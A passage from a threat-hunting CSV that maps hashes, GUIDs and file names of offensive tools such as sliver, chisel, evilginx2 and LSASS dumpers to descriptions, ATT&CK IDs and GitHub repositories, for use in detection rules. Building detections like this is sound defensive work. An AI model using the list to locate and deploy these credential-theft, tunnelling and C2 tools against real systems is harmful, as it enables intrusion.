TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*",".{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b*",".{0,1000}1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e*",".{0,1000}1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c*",".{0,1000}1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9*",".{0,1000}1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies 
allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264*",".{0,1000}1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6*",".{0,1000}1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*1E0986B4-4BF3-4CEA-A885-347B6D232D46*",".{0,1000}1E0986B4\-4BF3\-4CEA\-A885\-347B6D232D46.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9*",".{0,1000}1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95*",".{0,1000}1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1E70D62D-CC36-480F-82BB-E9593A759AF9*",".{0,1000}1E70D62D\-CC36\-480F\-82BB\-E9593A759AF9.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf*",".{0,1000}1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294*",".{0,1000}1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364*",".{0,1000}1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746*",".{0,1000}1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c*",".{0,1000}1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b*",".{0,1000}1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6*",".{0,1000}1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f*",".{0,1000}1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb*",".{0,1000}1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*",".{0,1000}1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed*",".{0,1000}1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 
- T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f*",".{0,1000}1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe*",".{0,1000}1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d*",".{0,1000}1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268*",".{0,1000}1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1fc325f3-c548-43db-a13f-8c460dda8381*",".{0,1000}1fc325f3\-c548\-43db\-a13f\-8c460dda8381.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c*",".{0,1000}1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0*",".{0,1000}1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1FDCAD33-E5D1-4D5F-ACD5-FA6F8661DFE5*",".{0,1000}1FDCAD33\-E5D1\-4D5F\-ACD5\-FA6F8661DFE5.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595*",".{0,1000}1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614*",".{0,1000}1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*",".{0,1000}1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" 
"*1mil-AD-passwords.txt*",".{0,1000}1mil\-AD\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*1N3/Sn1per*",".{0,1000}1N3\/Sn1per.{0,1000}","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","7528","1769","2024-04-01T22:52:32Z","2015-09-06T15:47:38Z" "*1N73LL1G3NC3x/Nightmangle*",".{0,1000}1N73LL1G3NC3x\/Nightmangle.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*1njected/CMLoot*",".{0,1000}1njected\/CMLoot.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*1password2john.py*",".{0,1000}1password2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2_lyncbrute.sh*",".{0,1000}2_lyncbrute\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack 
self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99*",".{0,1000}200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4*",".{0,1000}2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650*",".{0,1000}20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*",".{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964*",".{0,1000}205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals 
